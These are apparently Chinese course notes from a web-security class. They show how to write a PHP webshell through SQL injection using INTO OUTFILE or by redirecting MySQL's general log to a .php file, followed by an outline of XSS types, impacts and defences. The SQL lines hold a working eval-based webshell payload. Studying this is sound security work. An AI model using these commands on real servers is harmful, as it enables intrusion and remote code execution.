day26_kls

课程内容

sql注入写webshell

写文件

SELECT '<!--?php @eval($_POST["cmd"]); ?-->' INTO OUTFILE '/var/www/html/shell.php';

利用条件

secure-file-priv为空或为能够访问到的目录

sql注入日志写webshell

开启mysql日志记录

set GLOBAL general_log = on;

修改mysql的基础日志文件保存位置/var/www/html/xxxx.php

set GLOBAL general_log_file = "/var/www/html/6666.php";

xss

分类

反射型

存储型

dom型

xxe

原因

后端未经严格验证导致用户可控的输入传给前端,造成输入被解析为js

危害

窃取用户敏感信息

劫持浏览器

记录用户输入

挖掘

白盒

黑盒

bp一顿扫

利用

反射型

通过短链接的方式让用户执行恶意script

存储型

等待被害者上钩

dom型

同反射型

常用payload

![](xxx)

防御

上waf

前端过滤

后端过滤

绕过防御